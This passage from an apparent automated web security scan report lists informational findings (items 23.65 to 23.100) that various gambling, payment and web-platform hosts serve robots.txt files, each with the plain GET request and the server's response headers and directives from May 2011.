Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sv.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=r4ms26lcld0out02d22uqik7m1; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123562; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540937; expires=Tue, 15-May-2012 12:34:07 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:34:07 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.65. http://twitter.com/ukscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ukscratch

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:45 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305547125266935; path=/; expires=Mon, 23-May-11 11:58:45 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 11:58:45 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

23.66. http://va.px.invitemedia.com/goog_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/goog_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

23.67. http://video.google.com/googleplayer.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.google.com
Path:	/googleplayer.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
Date: Fri, 13 May 2011 20:19:57 GMT
Expires: Sat, 12 May 2012 20:19:57 GMT
X-Content-Type-Options: nosniff
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 00:14:39 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 231342

User-agent: *
Allow: /?cat=
Disallow: /?
Disallow: /docinfo
Disallow: /playrelated
Disallow: /related
Disallow: /stats
Allow: /support
Disallow: /s
Disallow: /timedtext
Disallow: /url
Allow: /videopla
...[SNIP]...

23.68. http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://winnings.com
Path:	/wp-content/plugins/google-analyticator/external-tracking.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=fl74nibuu7n9eu3bjccm899fl4; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103122744; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540139; expires=Tue, 15-May-2012 11:41:25 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 11:41:25 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.69. http://winter.metacafe.com/Openx/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://winter.metacafe.com
Path:	/Openx/www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: winter.metacafe.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:31 GMT
Server: Apache
Set-Cookie: PHPSESSID=5736a6d5410233f5464ea3599c64b67e; path=/; domain=.metacafe.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%22bfd41e469929c8e3ea84da694e238c09%22%2C%22LEID%22%3A39%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B0%2C9%5D%2C%22ffilter%22%3Atrue%7D; expires=Sat, 14-May-2016 12:49:31 GMT; path=/; domain=.metacafe.com
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Keep-Alive: timeout=2, max=20
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

23.70. http://www.adobe.com/go/getflashplayer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/go/getflashplayer

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 13 May 2011 19:57:27 GMT
ETag: "555-b71057c0"
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Mon, 16 May 2011 06:54:55 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/plain
Connection: close
Date: Mon, 16 May 2011 12:12:43 GMT
Age: 560
Content-Length: 1365

#
# This file is used to allow crawlers to index our site.
#
# List of all web robots: http://www.robotstxt.org/wc/active/html/index.html
#
# Check robots.txt at:
# http://www.searchengineworld.com/c
...[SNIP]...

23.71. http://www.apple.com/qtactivex/qtplugin.cab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apple.com
Path:	/qtactivex/qtplugin.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
ETag: "41-3241c557be880"
Server: Apache/2.2.14 (Unix)
Last-Modified: Tue, 06 Jan 1998 23:24:02 GMT
nnCoection: close
X-Cache-TTL: 600
X-Cached-Time: Wed, 04 Aug 2010 21:30:00 GMT
Content-Type: text/plain; charset=utf-8
Cteonnt-length: 65
Cache-Control: max-age=139
Expires: Mon, 16 May 2011 12:27:26 GMT
Date: Mon, 16 May 2011 12:25:07 GMT
Content-Length: 65
Connection: close

# robots.txt for http://www.apple.com/
User-agent: *
Disallow:

23.72. https://www.aspireaffiliates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aspireaffiliates.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: https://www.aspireaffiliates.com/sitemap.xml.gz

23.73. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.betsson.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 14:10:58 GMT
Accept-Ranges: bytes
ETag: "0c5cf114085c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:36 GMT
Connection: close
Content-Length: 120
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/

User-agent: *
Disallow:
User-Agent: Googlebot
Disallow: /xml/sportsbook/
Sitemap: http://www.betsson.com/sitemap.xml

23.74. http://www.clickandbuy.com/WW_en/payment/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clickandbuy.com
Path:	/WW_en/payment/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clickandbuy.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:00 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 09:26:08 GMT
ETag: "c81afc-17-4a3613ed2cc00"
Accept-Ranges: bytes
Content-Length: 23
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Allow: /

23.75. http://www.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crazyscratch.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2011 11:15:08 GMT
Accept-Ranges: bytes
ETag: "72b5cbec1d8cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:41:28 GMT
Connection: close
Content-Length: 243

User-agent: *
Disallow: /*.swf$
Disallow: /*.aspx$
Disallow: /*.as$
Disallow: /*js$
Disallow: /js/
Disallow: /services/
Disallow: /images/
Disallow: /chromemenu/
Disallow: /geoip/
Disallow:
...[SNIP]...

23.76. http://www.facebook.com/WinningsCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/WinningsCom

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.123.55
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

23.77. http://www.gambleaware.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gambleaware.co.uk
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gambleaware.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 28 Feb 2011 14:21:58 GMT
ETag: "1802ac0a-15b-49d5867066d80"
Accept-Ranges: bytes
Content-Length: 347
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /blocks
Disallow: /concrete
Disallow: /config
Disallow: /controllers
Disallow: /css
Disallow: /elements
Disallow: /helpers
Disallow: /jobs
Disallow: /js
Disallow: /lan
...[SNIP]...

23.78. http://www.gamblersanonymous.org.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamblersanonymous.org.uk
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamblersanonymous.org.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:39:29 GMT
Server: Apache/2
Last-Modified: Fri, 18 Feb 2011 20:19:29 GMT
ETag: "8c0047-130-49c943b30f640"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

23.79. http://www.gamcare.org.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamcare.org.uk
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamcare.org.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:01:55 GMT
Server: Apache
Last-Modified: Mon, 14 Jan 2008 17:13:02 GMT
ETag: "a6508a-34-c9dfc380"
Accept-Ranges: bytes
Content-Length: 52
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /forum/
Disallow: /cart.php

23.80. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 16 May 2011 11:39:41 GMT
Expires: Mon, 16 May 2011 11:39:41 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

23.81. http://www.heavenaffiliates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heavenaffiliates.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heavenaffiliates.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:34 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.heavenaffiliates.com/sitemap.xml.gz

23.82. https://www.interwetten.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interwetten.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 11 May 2011 11:00:24 GMT
Accept-Ranges: bytes
ETag: "0d4a6a0cafcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Connection: close
Date: Mon, 16 May 2011 11:43:22 GMT
Age: 113
Content-Length: 273

User-Agent: *
Disallow: /pt
Disallow: /es
Disallow: /es-MX
Disallow: /it
Disallow: /de-AT
Disallow: /de-DE
Disallow: /de-CH
Disallow: /WebResource.axd
Disallow: /ScriptResource.axd
Disallow:
...[SNIP]...

23.83. http://www.itechlabs.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itechlabs.com.au
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itechlabs.com.au

Response

HTTP/1.1 200 OK
Content-Length: 52
Content-Type: text/plain
Last-Modified: Wed, 20 Oct 2010 12:17:34 GMT
Accept-Ranges: bytes
ETag: "1216e3c65070cb1:47722"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:54 GMT
Connection: close

User-agent: *
Disallow: /CMS/
Disallow: /temp/

23.84. http://www.lga.org.mt/lga/content.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lga.org.mt
Path:	/lga/content.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lga.org.mt

Response

HTTP/1.1 200 OK
Content-Length: 49
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 13:09:14 GMT
Accept-Ranges: bytes
ETag: "f02fc8fbc579cb1:1ea77"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:46:26 GMT
Connection: close

User-agent: *
Disallow: /financemalta/
Allow: /

23.85. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain
Date: Mon, 16 May 2011 12:25:15 GMT
Content-Length: 1146
Connection: close
Set-Cookie: PHPSESSID=96c66f0eebdcc7c99987b345a7c6e6b6; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%2234efbe47313a7b7772f14e23e8ad0334%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B0%2C9%5D%2C%22ffilter%22%3Atrue%7D; expires=Sat, 14-May-2016 12:25:15 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3417313452.20480.0000; expires=Mon, 16-May-2011 13:25:15 GMT; path=/

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer.php
Disallow: /invi
...[SNIP]...

23.86. http://www.national-lottery.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.national-lottery.co.uk
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.national-lottery.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:05 GMT
Server: national-lottery
Set-Cookie: CAMTRACK=10.250.3.21.1305547925464066; path=/
Last-Modified: Thu, 28 Jan 2010 16:21:24 GMT
ETag: "5d82f-a3-47e3be8fe6900"
Accept-Ranges: bytes
Content-Length: 163
Vary: Accept-Encoding
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" comment "ICRAonline EN v2.0" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Connection: close
Content-Type: text/plain

# robots.txt for http://www.national-lottery.co.uk

User-agent: *
Disallow: /player/account
Disallow: /player/user
Disallow: /player/geo
Disallow: /player/gaming

23.87. http://www.nedstat.com/terms.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nedstat.com
Path:	/terms.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nedstat.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 28 Jul 2010 08:42:58 GMT
ETag: "106420-18f-48c6e9ac90880"
Accept-Ranges: bytes
Content-Length: 399
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /integration-test/
Disallow: /kampyle/
Disallow: /language/
Dis
...[SNIP]...

23.88. https://www.neogamespartners.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.neogamespartners.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:47:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: https://www.neogamespartners.com/sitemap.xml.gz

23.89. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opensource.org

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:18 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Last-Modified: Fri, 17 Dec 2010 13:48:34 GMT
ETag: "21a0287-624-4979b6d297080"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Mon, 30 May 2011 12:45:18 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

23.90. http://www.paysafecard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paysafecard.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paysafecard.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:04 GMT
Last-Modified: Mon, 20 Dec 2010 11:46:44 GMT
ETag: "ac4008-1b0-12f9d100"
Accept-Ranges: bytes
Content-Length: 432
Keep-Alive: timeout=15, max=88
Connection: close
Content-Type: text/plain
Set-Cookie: TSdab043=d037dfa1cea7a1c108647b025aa2dda57dc7d9e2ca973e684dd11944; Path=/

User-Agent: *

Disallow: /cgi-bin/
Disallow: /fileadmin/
Disallow: /*.XML
Disallow: /intranet/
Disallow: /index.php?id=710
Disallow: /index.php?id=728
Disallow: /index.php?id=721
Disallow: /index.php?
...[SNIP]...

23.91. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/PaidGames/PostcodeLotteryScratch.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.postcodelottery.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8h DAV/2
Last-Modified: Tue, 07 Dec 2010 09:22:17 GMT
ETag: "fbd4-131-496ce8a720440"
Accept-Ranges: bytes
Content-Length: 305
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /upload/
Disallow: /upload_mm/
Disallow: /static/npluk/
Disallow: /PersonalisationTest.htm
Disallow: /TestSalesMetCampaignCode.htm
Disallow: /DrawResults/RecentWinners/Go
...[SNIP]...

23.92. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.postcodelottery.com
Path:	/PlayNOW/OrderYourTickets.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.postcodelottery.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8h DAV/2
Last-Modified: Tue, 07 Dec 2010 09:22:17 GMT
ETag: "14886-131-496ce8a720440"
Accept-Ranges: bytes
Content-Length: 305
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /upload/
Disallow: /upload_mm/
Disallow: /static/npluk/
Disallow: /PersonalisationTest.htm
Disallow: /TestSalesMetCampaignCode.htm
Disallow: /DrawResults/RecentWinners/Go
...[SNIP]...

23.93. http://www.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thawte.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thawte.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:24:06 GMT
Server: Apache
Set-Cookie: v1st=E3E8AFCA7D29B0B7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Last-Modified: Tue, 01 Feb 2011 13:50:52 GMT
ETag: "293006d-d6-49b38d2166700"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /assets/templates/
Disallow: /ssl/extended-validation-ssl-certificates/microsoft-hosting-gallery/index.html
Disallow: /ssl/web-server-ssl-certificates/microsoft-hosting-gall
...[SNIP]...

23.94. https://www.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.thawte.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thawte.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:54 GMT
Server: Apache
Set-Cookie: v1st=402EA0DF177407D6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Last-Modified: Tue, 01 Feb 2011 13:50:52 GMT
ETag: "27000b6-d6-49b38d2166700"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /assets/templates/
Disallow: /ssl/extended-validation-ssl-certificates/microsoft-hosting-gallery/index.html
Disallow: /ssl/web-server-ssl-certificates/microsoft-hosting-gall
...[SNIP]...

23.95. http://www.trustlogo.com/ttb_searcher/trustlogo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trustlogo.com
Path:	/ttb_searcher/trustlogo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trustlogo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 12:31:59 GMT
Content-Type: text/plain
Content-Length: 161
Last-Modified: Tue, 29 Jun 2010 20:34:03 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /images/
Disallow: /javascript/
Disallow: /certs/
Disallow: /css/
Disallow: /trustlogo/

User-agent: TurnitinBot
Disallow: /

23.96. http://www.tstglobal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tstglobal.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tstglobal.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 09 Sep 2010 22:58:30 GMT
ETag: "ea90e5-46-48fdb91965180"
Accept-Ranges: bytes
Content-Length: 70
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

Sitemap: http://www.tstglobal.com/sitemap.xml

23.97. http://www.ukash.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ukash.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ukash.com

Response

HTTP/1.1 200 OK
Content-Length: 220
Content-Type: text/plain
Last-Modified: Fri, 01 May 2009 09:17:16 GMT
Accept-Ranges: bytes
ETag: "d3e4329f3dcac91:d3c2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:28 GMT
Connection: close

User-Agent: *
Disallow: /tent/
Disallow: /tent/cms.aspx
Disallow: /ukashPrivateLogos.html
Disallow: /uk/en/ukash-adult.aspx
Disallow: /uk/en/ukash-adult
Disallow: /uk/en/adult
Disallow: /uk/en/
...[SNIP]...

23.98. http://www.verisign.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:15 GMT
Server: Apache
Set-Cookie: v1st=889CE7A344F6A3C7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Last-Modified: Wed, 19 Jan 2011 20:38:22 GMT
ETag: "2320001-5a-49a38ff7beb80"
Accept-Ranges: bytes
Content-Length: 90
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /dm/
Disallow: /images/
Disallow: /Unlinked_Pages/
Disallow: /dev/

23.99. http://www.vincite.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vincite.net
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vincite.net

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=uk1l0uorbl4fsjf8qi7git3b41; path=/; domain=.vincite.net
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.vincite.net
Set-Cookie: winnings[sessionId]=103122920; path=/; domain=.vincite.net
Set-Cookie: winnings[vid]=540306; expires=Tue, 15-May-2012 12:02:34 GMT; path=/; domain=.vincite.net
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:02:34 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.100. http://www.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
